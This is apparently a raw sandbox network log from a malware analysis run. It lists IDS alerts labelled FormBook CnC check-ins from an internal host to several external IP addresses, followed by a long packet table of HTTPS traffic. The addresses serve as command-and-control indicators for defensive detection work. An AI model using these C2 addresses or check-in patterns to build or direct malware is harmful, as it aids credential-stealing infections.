                                                                                                                                                    2024-10-04T11:58:35.129447+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049738184.73.212.5180TCP
                                                                                                                                                    2024-10-04T11:58:37.752767+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049739184.73.212.5180TCP
                                                                                                                                                    2024-10-04T11:58:40.382196+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049740184.73.212.5180TCP
                                                                                                                                                    2024-10-04T11:58:45.962685+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049741199.192.19.1980TCP
                                                                                                                                                    2024-10-04T11:58:48.664928+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049742199.192.19.1980TCP
                                                                                                                                                    2024-10-04T11:58:51.398863+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049743199.192.19.1980TCP
                                                                                                                                                    2024-10-04T11:58:54.104418+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049744199.192.19.1980TCP
                                                                                                                                                    2024-10-04T11:58:59.739044+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974513.248.169.4880TCP
                                                                                                                                                    2024-10-04T11:59:02.371082+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974613.248.169.4880TCP
                                                                                                                                                    2024-10-04T11:59:07.622670+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204974813.248.169.4880TCP
                                                                                                                                                    2024-10-04T11:59:14.156696+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974943.252.167.18880TCP
                                                                                                                                                    2024-10-04T11:59:17.018828+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975043.252.167.18880TCP
                                                                                                                                                    2024-10-04T11:59:19.836896+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975143.252.167.18880TCP
                                                                                                                                                    2024-10-04T11:59:22.696493+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204975243.252.167.18880TCP
                                                                                                                                                    2024-10-04T11:59:34.103136+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975331.217.192.15880TCP
                                                                                                                                                    2024-10-04T11:59:36.967467+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975431.217.192.15880TCP
                                                                                                                                                    2024-10-04T11:59:39.617333+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975531.217.192.15880TCP
                                                                                                                                                    2024-10-04T11:59:42.269475+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204975631.217.192.15880TCP
                                                                                                                                                    2024-10-04T11:59:48.483360+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049757191.101.104.16480TCP
                                                                                                                                                    2024-10-04T11:59:51.100049+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049758191.101.104.16480TCP
                                                                                                                                                    2024-10-04T11:59:53.725946+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049759191.101.104.16480TCP
                                                                                                                                                    2024-10-04T11:59:55.826713+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049760191.101.104.16480TCP
                                                                                                                                                    2024-10-04T12:00:01.206635+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049761162.255.119.15080TCP
                                                                                                                                                    2024-10-04T12:00:03.852161+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049762162.255.119.15080TCP
                                                                                                                                                    2024-10-04T12:00:06.493041+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049763162.255.119.15080TCP
                                                                                                                                                    2024-10-04T12:00:09.132400+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049764162.255.119.15080TCP
                                                                                                                                                    2024-10-04T12:00:22.827350+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976591.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:00:25.530093+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976691.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:00:28.232417+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976791.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:00:30.935743+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204976891.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:00:38.135471+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976946.102.130.11680TCP
                                                                                                                                                    2024-10-04T12:00:40.964259+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977046.102.130.11680TCP
                                                                                                                                                    2024-10-04T12:00:43.805558+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977146.102.130.11680TCP
                                                                                                                                                    2024-10-04T12:00:46.653352+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204977246.102.130.11680TCP
                                                                                                                                                    2024-10-04T12:01:08.549229+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977391.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:01:11.253810+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977491.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:01:13.957598+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977591.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:01:16.659293+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204977691.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:01:30.187290+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977791.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:01:32.889888+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977891.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:01:38.295267+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204978091.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:01:43.691054+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049781185.134.245.11380TCP
                                                                                                                                                    2024-10-04T12:01:46.408402+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049782185.134.245.11380TCP
                                                                                                                                                    2024-10-04T12:01:49.130249+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049783185.134.245.11380TCP
                                                                                                                                                    2024-10-04T12:01:51.854813+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049784185.134.245.11380TCP
                                                                                                                                                    2024-10-04T12:01:57.074401+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049785184.73.212.5180TCP
                                                                                                                                                    2024-10-04T12:01:59.690855+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049786184.73.212.5180TCP
                                                                                                                                                    2024-10-04T12:02:02.318924+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049787184.73.212.5180TCP
                                                                                                                                                    2024-10-04T12:02:04.941213+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049788184.73.212.5180TCP
                                                                                                                                                    2024-10-04T12:02:10.337070+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049789199.192.19.1980TCP
                                                                                                                                                    2024-10-04T12:02:13.048970+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049790199.192.19.1980TCP
                                                                                                                                                    2024-10-04T12:02:15.751004+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049791199.192.19.1980TCP
                                                                                                                                                    2024-10-04T12:02:18.453635+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049792199.192.19.1980TCP
                                                                                                                                                    2024-10-04T12:02:23.858692+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979313.248.169.4880TCP
                                                                                                                                                    2024-10-04T12:02:26.487228+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979413.248.169.4880TCP
                                                                                                                                                    2024-10-04T12:02:31.734635+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204979613.248.169.4880TCP
                                                                                                                                                    2024-10-04T12:02:37.373667+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979743.252.167.18880TCP
                                                                                                                                                    2024-10-04T12:02:40.228351+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979843.252.167.18880TCP
                                                                                                                                                    2024-10-04T12:02:43.042666+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979943.252.167.18880TCP
                                                                                                                                                    2024-10-04T12:02:45.882628+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980043.252.167.18880TCP
                                                                                                                                                    2024-10-04T12:02:51.905752+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980131.217.192.15880TCP
                                                                                                                                                    2024-10-04T12:02:54.851294+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980231.217.192.15880TCP
                                                                                                                                                    2024-10-04T12:02:57.669541+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980331.217.192.15880TCP
                                                                                                                                                    2024-10-04T12:03:01.172727+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980431.217.192.15880TCP
                                                                                                                                                    2024-10-04T12:03:06.873312+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049805191.101.104.16480TCP
                                                                                                                                                    2024-10-04T12:03:09.005119+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049806191.101.104.16480TCP
                                                                                                                                                    2024-10-04T12:03:11.627524+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049807191.101.104.16480TCP
                                                                                                                                                    2024-10-04T12:03:14.253639+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049808191.101.104.16480TCP
                                                                                                                                                    2024-10-04T12:03:19.496600+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049809162.255.119.15080TCP
                                                                                                                                                    2024-10-04T12:03:22.136818+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049810162.255.119.15080TCP
                                                                                                                                                    2024-10-04T12:03:24.778448+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049811162.255.119.15080TCP
                                                                                                                                                    2024-10-04T12:03:27.416313+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049812162.255.119.15080TCP
                                                                                                                                                    2024-10-04T12:03:49.267450+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981391.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:03:51.968740+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981491.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:03:57.373971+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981691.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:04:02.687005+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049817172.66.44.7380TCP
                                                                                                                                                    2024-10-04T12:04:05.312581+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049818172.66.44.7380TCP
                                                                                                                                                    2024-10-04T12:04:07.935355+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049819172.66.44.7380TCP
                                                                                                                                                    2024-10-04T12:04:10.558718+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049820172.66.44.7380TCP
                                                                                                                                                    2024-10-04T12:04:16.613852+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049821193.108.130.2380TCP
                                                                                                                                                    2024-10-04T12:04:19.640390+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049822193.108.130.2380TCP
                                                                                                                                                    2024-10-04T12:04:21.785557+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049823193.108.130.2380TCP
                                                                                                                                                    2024-10-04T12:04:24.340549+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049824193.108.130.2380TCP
                                                                                                                                                    2024-10-04T12:04:29.755684+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204982574.208.236.22580TCP
                                                                                                                                                    2024-10-04T12:04:40.249445+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204982691.195.240.1980TCP
                                                                                                                                                    2024-10-04T12:04:45.648521+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049827185.134.245.11380TCP
                                                                                                                                                    2024-10-04T12:04:50.872277+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049828184.73.212.5180TCP
                                                                                                                                                    2024-10-04T12:04:57.558078+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049829199.192.19.1980TCP
                                                                                                                                                    2024-10-04T12:05:02.965053+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983013.248.169.4880TCP
                                                                                                                                                    2024-10-04T12:05:08.587904+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983143.252.167.18880TCP
                                                                                                                                                    2024-10-04T12:05:14.458837+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983231.217.192.15880TCP
                                                                                                                                                    2024-10-04T12:05:20.342733+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049833191.101.104.16480TCP
                                                                                                                                                    2024-10-04T12:05:25.578613+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049834162.255.119.15080TCP
                                                                                                                                                    2024-10-04T12:05:41.309214+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983591.195.240.1980TCP
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Oct 4, 2024 11:57:17.128823042 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.128921032 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.129128933 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.154033899 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.154119968 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.408282995 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.408503056 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.408550978 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.409879923 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.410058975 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.446091890 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.446202040 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.447320938 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.447479963 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.449706078 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.492295027 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.645493031 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.645713091 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.645783901 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.645955086 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.645992994 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.646120071 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.646996021 CEST49730443192.168.11.20142.251.40.174
                                                                                                                                                    Oct 4, 2024 11:57:17.647072077 CEST44349730142.251.40.174192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.795166016 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:17.795197964 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:17.795418978 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:17.795758963 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:17.795777082 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:18.028476954 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:18.028633118 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:18.028692007 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:18.034154892 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:18.034189939 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:18.034873009 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:18.035012960 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:18.035279036 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:18.076343060 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.474771976 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.475016117 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.488622904 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.488890886 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.495299101 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.495548010 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.502526045 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.502666950 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.502734900 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.502907038 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.502947092 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.503112078 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.571711063 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.571924925 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.571996927 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.572195053 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.575196028 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.575434923 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.575506926 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.575809002 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.582396984 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.582618952 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.582690001 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.582973003 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.589430094 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.589612961 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.589685917 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.589967012 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.596540928 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.596765995 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.596837044 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.597079039 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.603693962 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.603914022 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.603986979 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.604208946 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.610822916 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.611023903 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.611103058 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.611340046 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.617959976 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.618161917 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.618232012 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.618463039 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.624536037 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.624738932 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.624811888 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.625057936 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.631062031 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.631254911 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.631328106 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.631576061 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.637439966 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.637636900 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.637706995 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.637954950 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.644386053 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.644603014 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.644709110 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.644954920 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.650664091 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.651014090 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.654007912 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.654280901 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.654377937 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.654587030 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.669435024 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.669670105 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.669765949 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.670015097 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.671996117 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.672216892 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.672322035 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.672564983 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.676780939 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.676995993 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.677073956 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.677323103 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.681622982 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.681837082 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.681937933 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.682179928 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.686208963 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.686428070 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.686517954 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.686759949 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.690781116 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.691041946 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.691071033 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.691155910 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.691313028 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.691371918 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.695389032 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.695669889 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.695753098 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.696044922 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.699971914 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.700232983 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.700324059 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.700638056 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.704613924 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.704826117 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.704885960 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.705131054 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.708995104 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.709223986 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.709299088 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.709543943 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.713639021 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.713924885 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.713993073 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.714251995 CEST49731443192.168.11.20142.250.176.193
